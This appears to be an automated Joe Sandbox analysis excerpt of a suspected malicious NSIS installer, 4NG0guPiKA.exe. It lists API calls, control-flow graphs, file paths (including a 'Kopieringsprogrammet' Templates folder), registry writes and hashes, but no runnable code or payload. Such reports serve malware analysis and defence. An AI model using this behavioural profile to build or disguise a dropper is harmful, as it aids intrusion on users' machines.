                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 914957316-3385261710
                                                                                                            • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                            • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                            • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                            • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 323 403cb6-403cbc 316->323 324 403c9e-403cb0 ShowWindow 316->324 328 403e67-403e82 318->328 320 403e24-403e2f call 401389 319->320 321 403e55-403e57 319->321 320->321 342 403e31-403e50 SendMessageW 320->342 321->318 327 4040fc 321->327 329 403cd8-403cdb 323->329 330 403cbe-403cd3 DestroyWindow 323->330 324->323 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 345 403e97-403ea2 334->345 346 4040ba-4040d3 DestroyWindow EndDialog 334->346 336->327 343 4040e1-4040e7 336->343 338->335 340 403d97-403da5 call 404196 339->340 341 403cfa-403d0b GetDlgItem 339->341 340->335 347 403d2a-403d2d 341->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 341->348 342->335 343->327 350 4040e9-4040f2 ShowWindow 343->350 345->346 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 345->351 346->336 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->340 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->340 361->356 366 403d52-403d58 call 40140b 362->366 367 403d67-403d70 call 40140b 362->367 377 403d5e 366->377 367->340 376 403d72-403d7c 367->376 376->377 
377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                            • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                            • DestroyWindow.USER32 ref: 00403CC4
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                            • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                            • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282139019-0
                                                                                                            • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                            • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                            • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                            • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

Control-flow Graph (entry block 402dbc-402e0a)
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4NG0guPiKA.exe,00000400), ref: 00402DEC
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00402E35
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4NG0guPiKA.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-1737419005
                                                                                                            • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                            • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C

Control-flow Graph (entry block 401752-401777)
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 00401793
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 004017B8
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nso68A0.tmp$C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                            • API String ID: 1941528284-1692931589
                                                                                                            • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                            • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                            • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                            • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

Control-flow Graph (entry block 402573-402588)
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                              • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 1149667376-2366072709
                                                                                                            • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                            • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                            • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                            • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69

                                                                                                             Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry block 40317d-4031a6, API calls GetTickCount, SetFilePointer, WriteFile
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00403192
                                                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                            • WriteFile.KERNELBASE(0040BE78,0040CF84,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                            • SetFilePointer.KERNELBASE(00006690,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$CountTickWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 2146148272-3854404225

                                                                                                             Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry block 402331-402377, API calls RegCreateKeyExW, lstrlenW, RegSetValueExW, RegCloseKey
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nso68A0.tmp
                                                                                                            • API String ID: 1356686001-1376522407

                                                                                                             Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry block 4015b9-4015cd, API calls CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW
                                                                                                            APIs
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,774D2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 004059EE
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,00000000,000000F0), ref: 00401630
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 00401623
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                            • API String ID: 3751793516-406486772

                                                                                                             Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry block 10001771-100017ad, API calls GlobalFree, FreeLibrary
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                              • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                              • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                              • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                              • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                              • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                              • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767494692-3916222277

                                                                                                             Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry block 403062-403070, API calls SetFilePointer, ReadFile, WriteFile
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                            • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$PointerWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 539440098-3854404225
                                                                                                            • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
